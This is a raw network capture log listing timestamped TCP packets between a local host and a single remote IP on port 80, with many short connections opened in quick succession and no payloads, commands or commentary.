Feb 7, 2023 19:58:54.051942110 CET	80	50099	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.053150892 CET	50099	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.165869951 CET	50099	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.166563034 CET	50100	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.226366043 CET	80	50099	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.227498055 CET	80	50100	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.228071928 CET	50099	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.228116035 CET	50100	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.228468895 CET	50100	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.290025949 CET	80	50100	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.292793989 CET	80	50100	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.295324087 CET	50100	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.403213024 CET	50100	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.403893948 CET	50101	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.463884115 CET	80	50100	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.464072943 CET	50100	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.466876030 CET	80	50101	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.467036009 CET	50101	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.467417955 CET	50101	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.529719114 CET	80	50101	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.532475948 CET	80	50101	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.532618999 CET	50101	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.650451899 CET	50101	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.651274920 CET	50102	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.712903976 CET	80	50101	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.713052034 CET	50101	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.713696003 CET	80	50102	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.713829994 CET	50102	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.714298964 CET	50102	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.776758909 CET	80	50102	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.779995918 CET	80	50102	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.780123949 CET	50102	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.884685040 CET	50102	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.885303974 CET	50103	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.947814941 CET	80	50102	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.947850943 CET	80	50103	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:54.948019981 CET	50103	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.948057890 CET	50102	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:54.948415995 CET	50103	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.010832071 CET	80	50103	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.013876915 CET	80	50103	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.013973951 CET	50103	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.119541883 CET	50103	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.120697975 CET	50104	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.182018042 CET	80	50103	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.182172060 CET	50103	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.183334112 CET	80	50104	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.183454037 CET	50104	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.183792114 CET	50104	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.246856928 CET	80	50104	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.254606962 CET	80	50104	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.254724026 CET	50104	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.378997087 CET	50104	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.394706011 CET	50105	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.441528082 CET	80	50104	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.441652060 CET	50104	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.457206011 CET	80	50105	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.457375050 CET	50105	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.457748890 CET	50105	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.519586086 CET	80	50105	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.523557901 CET	80	50105	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.524262905 CET	50105	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.635694981 CET	50105	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.636389971 CET	50106	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.697195053 CET	80	50106	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.697220087 CET	80	50105	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.697285891 CET	50106	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.697446108 CET	50105	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.697715044 CET	50106	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.758450985 CET	80	50106	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.760951042 CET	80	50106	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.761029959 CET	50106	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.873857975 CET	50106	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.874155045 CET	50107	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.933511019 CET	80	50107	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.933641911 CET	50107	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.934398890 CET	80	50106	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:55.934487104 CET	50106	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:55.941894054 CET	50107	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.001352072 CET	80	50107	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.004034996 CET	80	50107	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.004127026 CET	50107	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.119343042 CET	50107	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.120162964 CET	50108	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.179862976 CET	80	50107	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.179941893 CET	50107	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.181664944 CET	80	50108	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.182131052 CET	50108	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.182131052 CET	50108	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.243886948 CET	80	50108	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.248547077 CET	80	50108	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.248672962 CET	50108	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.354331970 CET	50108	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.356005907 CET	50109	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.415353060 CET	80	50109	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.415626049 CET	80	50108	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.415699959 CET	50109	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.415870905 CET	50108	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.416169882 CET	50109	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.475460052 CET	80	50109	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.477792025 CET	80	50109	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.478035927 CET	50109	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.595539093 CET	50109	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.596461058 CET	50110	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.654787064 CET	80	50109	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.654937029 CET	50109	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.656883955 CET	80	50110	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.657026052 CET	50110	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.657476902 CET	50110	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.717820883 CET	80	50110	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.720432997 CET	80	50110	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.720541000 CET	50110	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.833640099 CET	50110	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.835099936 CET	50111	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.894325018 CET	80	50110	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.895811081 CET	80	50111	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.895952940 CET	50110	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.896028996 CET	50111	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.896574020 CET	50111	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:56.957178116 CET	80	50111	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.959562063 CET	80	50111	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:56.963816881 CET	50111	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.072346926 CET	50111	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.073235035 CET	50112	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.133255959 CET	80	50111	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.133342028 CET	50111	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.135656118 CET	80	50112	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.135778904 CET	50112	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.136239052 CET	50112	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.198729992 CET	80	50112	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.203440905 CET	80	50112	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.203603983 CET	50112	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.307220936 CET	50112	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.308693886 CET	50113	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.369620085 CET	80	50113	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.369801998 CET	50113	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.369864941 CET	80	50112	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.369955063 CET	50112	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.370708942 CET	50113	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.431720972 CET	80	50113	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.436136007 CET	80	50113	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.436275959 CET	50113	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.541743994 CET	50113	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.542726040 CET	50114	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.602583885 CET	80	50113	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.602741957 CET	50113	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.604125977 CET	80	50114	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.604243994 CET	50114	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.604604959 CET	50114	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.665858030 CET	80	50114	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.668451071 CET	80	50114	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.668628931 CET	50114	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.776175022 CET	50114	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.777105093 CET	50115	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.837754965 CET	80	50114	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.837896109 CET	50114	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.838473082 CET	80	50115	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.838565111 CET	50115	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.838937044 CET	50115	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:57.900258064 CET	80	50115	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.902601004 CET	80	50115	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:57.902739048 CET	50115	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.022322893 CET	50115	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.023161888 CET	50116	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.083880901 CET	80	50115	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.084085941 CET	50115	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.086168051 CET	80	50116	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.086316109 CET	50116	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.086949110 CET	50116	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.149292946 CET	80	50116	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.152918100 CET	80	50116	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.153001070 CET	50116	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.265785933 CET	50116	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.266443968 CET	50117	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.327692986 CET	80	50117	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.327795982 CET	50117	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.328195095 CET	50117	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.329298973 CET	80	50116	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.329390049 CET	50116	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.388835907 CET	80	50117	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.392267942 CET	80	50117	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.392359018 CET	50117	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.494663954 CET	50117	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.495781898 CET	50118	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.555211067 CET	80	50117	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.555320978 CET	50117	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.556205034 CET	80	50118	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.556585073 CET	50118	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.558092117 CET	50118	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.618670940 CET	80	50118	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.621646881 CET	80	50118	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.621773005 CET	50118	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.729484081 CET	50118	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.730146885 CET	50119	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.790134907 CET	80	50118	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.790252924 CET	50118	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.791693926 CET	80	50119	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.791819096 CET	50119	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.794403076 CET	50119	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.856071949 CET	80	50119	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.859575033 CET	80	50119	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:58.859663963 CET	50119	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.963459015 CET	50119	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:58.964399099 CET	50120	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.025696993 CET	80	50119	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.025845051 CET	50119	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.026493073 CET	80	50120	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.026601076 CET	50120	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.032259941 CET	50120	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.094038963 CET	80	50120	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.098303080 CET	80	50120	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.098432064 CET	50120	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.213926077 CET	50120	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.215460062 CET	50121	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.275655031 CET	80	50120	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.275846004 CET	50120	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.276859045 CET	80	50121	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.277014017 CET	50121	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.277721882 CET	50121	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.339255095 CET	80	50121	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.342204094 CET	80	50121	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.342367887 CET	50121	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.449939013 CET	50121	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.450740099 CET	50122	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.511698008 CET	80	50121	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.511827946 CET	50121	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.515997887 CET	80	50122	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.516186953 CET	50122	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.516632080 CET	50122	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.579000950 CET	80	50122	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.582931995 CET	80	50122	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.583600998 CET	50122	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.697566032 CET	50122	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.698374033 CET	50123	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.758812904 CET	80	50123	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.759968996 CET	80	50122	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.760123014 CET	50122	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.760627031 CET	50123	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.760627031 CET	50123	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.821105003 CET	80	50123	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.823899031 CET	80	50123	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.824632883 CET	50123	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.933795929 CET	50123	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.934850931 CET	50124	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.994307995 CET	80	50123	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:59.997606039 CET	50123	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:59.997910023 CET	80	50124	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.000713110 CET	50124	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.013175011 CET	50124	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.076973915 CET	80	50124	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.081590891 CET	80	50124	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.085609913 CET	50124	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.198328018 CET	50124	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.199284077 CET	50125	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.261076927 CET	80	50124	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.261267900 CET	80	50125	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.261558056 CET	50124	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.261617899 CET	50125	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.262200117 CET	50125	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.323923111 CET	80	50125	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.328234911 CET	80	50125	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.328442097 CET	50125	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.437860012 CET	50125	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.439193964 CET	50126	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.499648094 CET	80	50125	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.499687910 CET	80	50126	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.499732971 CET	50125	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.499871969 CET	50126	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.503245115 CET	50126	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.563782930 CET	80	50126	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.568260908 CET	80	50126	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.568420887 CET	50126	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.682735920 CET	50126	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.683567047 CET	50127	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.743262053 CET	80	50126	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.743418932 CET	50126	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.744091034 CET	80	50127	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.744215012 CET	50127	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.745196104 CET	50127	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.805721045 CET	80	50127	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.809978962 CET	80	50127	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.810156107 CET	50127	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.921375990 CET	50127	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.923384905 CET	50128	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.983076096 CET	80	50127	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.983273029 CET	50127	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.984879971 CET	80	50128	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:00.984987020 CET	50128	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:00.987231016 CET	50128	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.048463106 CET	80	50128	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:01.053416967 CET	80	50128	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:01.053591967 CET	50128	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.337039948 CET	50128	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.343755960 CET	50129	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.398792028 CET	80	50128	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:01.398991108 CET	50128	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.405179024 CET	80	50129	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:01.405307055 CET	50129	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.428744078 CET	50129	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.489882946 CET	80	50129	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:01.493778944 CET	80	50129	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:01.493982077 CET	50129	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.642218113 CET	50129	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.643129110 CET	50130	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.702969074 CET	80	50129	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:01.703145981 CET	50129	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.705777884 CET	80	50130	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:01.706743956 CET	50130	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.720565081 CET	50130	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.784578085 CET	80	50130	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:01.786930084 CET	80	50130	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:01.788366079 CET	50130	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.948715925 CET	50131	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:01.948724985 CET	50130	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:02.010262966 CET	80	50131	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:02.010533094 CET	50131	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:02.011126041 CET	80	50130	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:02.011329889 CET	50130	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:02.039230108 CET	50131	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:02.101449013 CET	80	50131	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:02.106717110 CET	80	50131	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:02.106933117 CET	50131	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:02.261569023 CET	50131	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:02.262389898 CET	50132	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:02.323023081 CET	80	50132	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:02.323056936 CET	80	50131	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:02.323198080 CET	50131	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:02.325181007 CET	50132	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:02.326822996 CET	50132	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:02.387444973 CET	80	50132	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:02.390543938 CET	80	50132	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:02.390662909 CET	50132	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:03.300234079 CET	50132	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:03.319996119 CET	50133	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:03.361326933 CET	80	50132	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:03.361485004 CET	50132	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:03.382419109 CET	80	50133	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:03.382611036 CET	50133	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:03.417426109 CET	50133	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:03.480185032 CET	80	50133	62.204.41.4	192.168.2.5
